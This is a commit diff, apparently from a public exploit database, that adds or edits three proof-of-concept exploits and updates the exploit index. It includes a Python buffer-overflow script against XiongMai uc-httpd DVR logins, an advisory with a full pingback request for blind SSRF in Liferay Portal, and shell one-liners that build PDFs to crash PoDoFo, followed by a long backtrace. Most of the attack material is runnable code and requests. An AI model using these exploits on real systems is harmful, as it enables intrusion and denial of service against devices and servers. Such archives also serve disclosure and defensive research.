DB: 2018-06-27

3 changes to exploits/shellcodes PoDoFo 0.9.5 - Buffer Overflow Liferay Portal < 7.0.4 - Server-Side Request Forgery
2018-06-27 05:01:48 +00:00 · 2018-06-27 05:01:48 +00:00 · 2c912f897c
commit 2c912f897c
parent d8206fb5eb
4 changed files with 158 additions and 6 deletions
--- a/exploits/hardware/webapps/44864.py
+++ b/exploits/hardware/webapps/44864.py
@ -6,26 +6,27 @@
 # Tested on: KKMoon DVR running XiongMai uc-httpd 1.0.0 on TCP/81
 # CVE ID: CVE-2018-10088
 # DISCLAIMER: This proof of concept is provided for educational purposes only!
-
+ 
 #!/usr/bin/python
-
+ 
 import socket
 import sys
-
+ 
 payload="A" * 85
-
+ 
 print "\n###############################################"
 print "XiongMai uc-httpd 1.0.0 Buffer Overflow Exploit"
-
+ 
 if len(sys.argv) < 2:
    print "\nUsage: " + sys.argv[0] + " <Host>\n"
    sys.exit()
-
+ 
 print "\nTarget: " + sys.argv[1]
 print "Sending exploit..."
 s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 s.connect((sys.argv[1],81))
 s.send('POST /login.htm HTTP/1.1\r\n')
 s.send('command=login&username=' + payload + '&password=PoC\r\n\r\n')
 s.recv(1024)
 s.close()
 print "\nExploit complete!"
--- a/exploits/java/webapps/44945.txt
+++ b/exploits/java/webapps/44945.txt
@ -0,0 +1,83 @@
 1. ADVISORY INFORMATION
 ========================================
 Title: Liferay Portal < 7.0.4 Blind Server-Side Request Forgery
 Application: osTicket
 Remotely Exploitable: Yes
 Authentication Required: NO
 Versions Affected: <= 7.0.4
 Technology: Java
 Vendor URL: liferay.com
 Date of found: 04 December 2017
 Disclosure: 25 June 2018
 Author: Mehmet Ince
 2. CREDIT
 ========================================
 This vulnerability was identified during penetration test
 by Mehmet INCE from PRODAFT / INVICTUS
 3. Technical Details & POC
 ========================================
 POST /xmlrpc/pingback HTTP/1.1
 Host: mehmetince.dev:8080
 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML,
 like Gecko) Chrome/47.0.2526.73 Safari/537.36
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Connection: close
 Upgrade-Insecure-Requests: 1
 Content-Length: 361
 <?xml version="1.0" encoding="UTF-8"?>
 <methodCall>
 <methodName>pingback.ping</methodName>
 <params>
 <param>
 <value>http://TARGET/</value>
 </param>
 <param>
 <value>http://mehmetince.dev:8080/web/guest/home/-/blogs/30686</value>
 </param>
 </params>
 </methodCall>
--- a/exploits/linux/dos/44946.txt
+++ b/exploits/linux/dos/44946.txt
@ -0,0 +1,66 @@
 # Exploit Title: PoDoFo 0.9.5 - Stack-Based Buffer Overflow (PoC)
 # Date: 25.06.2018
 # Software Link: https://sourceforge.net/projects/podofo/
 # Vuln Version: 0.9.5
 # CVE: cve-2018-8002
 # Vulnerability Details:  https://bugzilla.redhat.com/show_bug.cgi?id=1548930
 # Exploit Author: r4xis
 https://github.com/r4xis
 exploit
 -------------
 podofo 0.9.3 (tested on ubuntu 16.04 32 bit)
 $ python -c 'print "%PDF- 1 0 obj<<" + "["*50000' > poc.pdf;podofopdfinfo poc.pdf
 podofo 0.9.4 (tested on debian 9.4 64 bit)
 $ python -c 'print "%PDF- 1 0 obj" + "["*50000 + "startxref 5%%EOF"' > poc.pdf ;podofopdfinfo poc.pdf
 podofo 0.9.5 (tested on ubuntu 18.04 64 bit)
 $ python -c 'print "%PDF- 1 0 obj" + "["*50000 + "startxref 5%%EOF"' > poc.pdf ;podofopdfinfo poc.pdf
 Note: Also you can use "<<" characters;
 $ python -c 'print "%PDF- 1 0 obj" + "<<"*50000 + "startxref 5%%EOF"' > poc.pdf ;podofopdfinfo poc.pdf
 reason
 -----------
 Recursive functions call to each others, until the stack overflow.
 backtrace 
 -----------
 for "[" chars;
 ...
 #28 0x00007ffff7ad00af in PoDoFo::PdfTokenizer::ReadArray(PoDoFo::PdfVariant&, PoDoFo::PdfEncrypt*) () from /usr/lib/libpodofo.so.0.9.5
 #29 0x00007ffff7acf57b in PoDoFo::PdfTokenizer::ReadDataType(PoDoFo::EPdfDataType, PoDoFo::PdfVariant&, PoDoFo::PdfEncrypt*) ()
   from /usr/lib/libpodofo.so.0.9.5
 #30 0x00007ffff7ad00af in PoDoFo::PdfTokenizer::ReadArray(PoDoFo::PdfVariant&, PoDoFo::PdfEncrypt*) () from /usr/lib/libpodofo.so.0.9.5
 #31 0x00007ffff7acf57b in PoDoFo::PdfTokenizer::ReadDataType(PoDoFo::EPdfDataType, PoDoFo::PdfVariant&, PoDoFo::PdfEncrypt*) ()
   from /usr/lib/libpodofo.so.0.9.5
 #32 0x00007ffff7ad00af in PoDoFo::PdfTokenizer::ReadArray(PoDoFo::PdfVariant&, PoDoFo::PdfEncrypt*) () from /usr/lib/libpodofo.so.0.9.5
 #33 0x00007ffff7acf57b in PoDoFo::PdfTokenizer::ReadDataType(PoDoFo::EPdfDataType, PoDoFo::PdfVariant&, PoDoFo::PdfEncrypt*) ()
   from /usr/lib/libpodofo.so.0.9.5
 #34 0x00007ffff7ad00af in PoDoFo::PdfTokenizer::ReadArray(PoDoFo::PdfVariant&, PoDoFo::PdfEncrypt*) () from /usr/lib/libpodofo.so.0.9.5
 #35 0x00007ffff7acf57b in PoDoFo::PdfTokenizer::ReadDataType(PoDoFo::EPdfDataType, PoDoFo::PdfVariant&, PoDoFo::PdfEncrypt*) ()
   from /usr/lib/libpodofo.so.0.9.5
 #36 0x00007ffff7ad00af in PoDoFo::PdfTokenizer::ReadArray(PoDoFo::PdfVariant&, PoDoFo::PdfEncrypt*) () from /usr/lib/libpodofo.so.0.9.5
 #37 0x00007ffff7acf57b in PoDoFo::PdfTokenizer::ReadDataType(PoDoFo::EPdfDataType, PoDoFo::PdfVariant&, PoDoFo::PdfEncrypt*) ()
   from /usr/lib/libpodofo.so.0.9.5
 #38 0x00007ffff7ad00af in PoDoFo::PdfTokenizer::ReadArray(PoDoFo::PdfVariant&, PoDoFo::PdfEncrypt*) () from /usr/lib/libpodofo.so.0.9.5
 #39 0x00007ffff7acf57b in PoDoFo::PdfTokenizer::ReadDataType(PoDoFo::EPdfDataType, PoDoFo::PdfVariant&, PoDoFo::PdfEncrypt*) ()
   from /usr/lib/libpodofo.so.0.9.5
 #40 0x00007ffff7ad00af in PoDoFo::PdfTokenizer::ReadArray(PoDoFo::PdfVariant&, PoDoFo::PdfEncrypt*) () from /usr/lib/libpodofo.so.0.9.5
 #41 0x00007ffff7acf57b in PoDoFo::PdfTokenizer::ReadDataType(PoDoFo::EPdfDataType, PoDoFo::PdfVariant&, PoDoFo::PdfEncrypt*) ()
   from /usr/lib/libpodofo.so.0.9.5
 #42 0x00007ffff7ad00af in PoDoFo::PdfTokenizer::ReadArray(PoDoFo::PdfVariant&, PoDoFo::PdfEncrypt*) () from /usr/lib/libpodofo.so.0.9.5
 #43 0x00007ffff7acf57b in PoDoFo::PdfTokenizer::ReadDataType(PoDoFo::EPdfDataType, PoDoFo::PdfVariant&, PoDoFo::PdfEncrypt*) ()
   from /usr/lib/libpodofo.so.0.9.5
 #44 0x00007ffff7ad00af in PoDoFo::PdfTokenizer::ReadArray(PoDoFo::PdfVariant&, PoDoFo::PdfEncrypt*) () from /usr/lib/libpodofo.so.0.9.5
 #45 0x00007ffff7acf57b in PoDoFo::PdfTokenizer::ReadDataType(PoDoFo::EPdfDataType, PoDoFo::PdfVariant&, PoDoFo::PdfEncrypt*) ()
   from /usr/lib/libpodofo.so.0.9.5
 #46 0x00007ffff7ad00af in PoDoFo::PdfTokenizer::ReadArray(PoDoFo::PdfVariant&, PoDoFo::PdfEncrypt*) () from /usr/lib/libpodofo.so.0.9.5
 #47 0x00007ffff7acf57b in PoDoFo::PdfTokenizer::ReadDataType(PoDoFo::EPdfDataType, PoDoFo::PdfVariant&, PoDoFo::PdfEncrypt*) ()
   from /usr/lib/libpodofo.so.0.9.5
 #48 0x00007ffff7ad00af in PoDoFo::PdfTokenizer::ReadArray(PoDoFo::PdfVariant&, PoDoFo::PdfEncrypt*) () from /usr/lib/libpodofo.so.0.9.5
 #49 0x00007ffff7acf57b in PoDoFo::PdfTokenizer::ReadDataType(PoDoFo::EPdfDataType, PoDoFo::PdfVariant&, PoDoFo::PdfEncrypt*) ()
 ...
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -5988,6 +5988,7 @@ id,file,description,date,author,type,platform,port
 44821,exploits/multiple/dos/44821.txt,"Epiphany 3.28.2.1 - Denial of Service",2018-06-01,"Dhiraj Mishra",dos,multiple,
 44832,exploits/linux/dos/44832.txt,"Linux Kernel < 4.16.11 - 'ext4_read_inline_data()' Memory Corruption",2018-06-05,"Google Security Research",dos,linux,
 44944,exploits/linux/dos/44944.txt,"KVM (Nested Virtualization) - L1 Guest Privilege Escalation",2018-06-25,"Google Security Research",dos,linux,
 44946,exploits/linux/dos/44946.txt,"PoDoFo 0.9.5 - Buffer Overflow",2018-06-26,r4xis,dos,linux,
 44846,exploits/php/dos/44846.txt,"PHP 7.2.2 - 'php_stream_url_wrap_http_ex' Buffer Overflow",2018-06-06,"Wei Lei and Liu Yang",dos,php,
 44847,exploits/macos/dos/44847.c,"Apple macOS Kernel - Use-After-Free Due to Lack of Locking in nvidia GeForce Driver",2018-06-06,"Google Security Research",dos,macos,
 44848,exploits/multiple/dos/44848.c,"Apple macOS/iOS Kernel - Heap Overflow Due to Lack of Lower Size Check in getvolattrlist",2018-06-06,"Google Security Research",dos,multiple,
@ -39544,6 +39545,7 @@ id,file,description,date,author,type,platform,port
 44839,exploits/hardware/webapps/44839.md,"Brother HL Series Printers 1.15 - Cross-Site Scripting",2018-06-04,"Huy Kha",webapps,hardware,
 44843,exploits/linux/webapps/44843.py,"Jenkins Mailer Plugin < 1.20 - Cross-Site Request Forgery (Send Email)",2018-06-05,Kl3_GMjq6,webapps,linux,
 44943,exploits/php/webapps/44943.txt,"WordPress Plugin iThemes Security < 7.0.3 - SQL Injection",2018-06-25,"Çlirim Emini",webapps,php,80
 44945,exploits/java/webapps/44945.txt,"Liferay Portal < 7.0.4 - Server-Side Request Forgery",2018-06-26,"Mehmet Ince",webapps,java,80
 44851,exploits/php/webapps/44851.txt,"WampServer 3.0.6 - Cross-Site Request Forgery",2018-06-07,L0RD,webapps,php,
 44853,exploits/php/webapps/44853.txt,"WordPress Form Maker Plugin 1.12.24 - SQL Injection",2018-06-07,defensecode,webapps,php,
 44854,exploits/php/webapps/44854.txt,"WordPress Contact Form Maker Plugin 1.12.20 - SQL Injection",2018-06-07,defensecode,webapps,php,